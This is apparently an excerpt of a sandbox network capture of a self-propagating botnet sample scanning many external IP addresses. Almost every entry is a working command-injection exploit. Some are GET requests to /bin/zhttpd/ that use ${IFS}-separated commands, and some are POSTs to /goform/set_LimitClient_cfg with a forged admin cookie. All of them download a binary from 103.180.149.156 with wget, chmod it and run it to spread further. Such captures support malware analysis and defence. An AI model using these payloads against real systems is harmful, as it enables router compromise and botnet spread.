                                                      Feb 2, 2024 06:35:59.777806997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6160192.168.2.143702838.157.1.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777841091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6161192.168.2.143628489.18.4.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777869940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6162192.168.2.1446398109.162.234.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777926922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6163192.168.2.144407452.46.215.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777966976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6164192.168.2.1436528180.162.80.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778018951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6165192.168.2.1459160131.58.92.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778048038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6166192.168.2.1453238190.130.109.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778075933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6167192.168.2.1455646190.247.226.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778115034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6168192.168.2.143896264.156.180.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778146982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6169192.168.2.1433212130.63.121.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778184891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6170192.168.2.1444186109.243.43.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778229952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6171192.168.2.1442692119.2.151.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778285027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6172192.168.2.1440248221.91.236.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778312922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6173192.168.2.145959227.162.150.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778361082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6174192.168.2.145584041.131.194.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778376102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6175192.168.2.145170091.8.121.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778438091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6176192.168.2.1442160159.178.50.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778493881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6177192.168.2.14588545.179.220.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778512001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6178192.168.2.144249241.251.126.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778551102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6179192.168.2.1453596206.129.188.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778579950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6180192.168.2.143595064.247.137.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778626919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6181192.168.2.1451920157.53.224.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778667927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6182192.168.2.1445814124.159.150.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778698921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6183192.168.2.143871886.171.35.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778749943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6184192.168.2.1442290187.154.139.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778789997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6185192.168.2.1445692165.170.107.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778830051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6186192.168.2.1433256191.95.100.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778856039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6187192.168.2.144766837.186.7.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778920889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6188192.168.2.1438146155.193.15.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778960943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6189192.168.2.144020032.99.221.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.778995037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6190192.168.2.1456932173.86.113.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.779022932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6191192.168.2.1452944216.21.39.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.779071093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6192192.168.2.1452236180.86.6.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.779104948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6193192.168.2.1460872132.200.148.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.779139996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6194192.168.2.1446406200.183.143.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.779180050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6195192.168.2.145101453.235.194.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.779521942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6196192.168.2.145669879.13.52.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.781982899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6197192.168.2.146046490.101.26.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.782685041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6198192.168.2.145574690.117.208.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.782711983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6199192.168.2.144930686.120.64.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.782769918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6200192.168.2.1452866186.62.112.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.782830954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6201192.168.2.1453754107.167.46.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.782875061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6202192.168.2.145523450.110.208.1978080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.966820955 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6203192.168.2.1435406109.36.27.688080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.313709974 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:01.013603926 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:02.389558077 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:05.337342024 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:10.965092897 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6204192.168.2.1438718119.73.199.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.791749001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6205192.168.2.1434442204.191.180.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.791796923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6206192.168.2.145440878.137.223.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.791855097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6207192.168.2.1449650198.176.27.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.791881084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6208192.168.2.1448382194.106.108.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.791924000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
